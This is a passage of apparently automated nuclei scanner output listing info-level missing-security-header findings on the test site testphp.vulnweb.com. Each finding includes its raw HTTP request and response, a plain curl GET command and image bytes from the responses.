ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u0017\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:20.519896906Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:21.426081241Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:58 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , 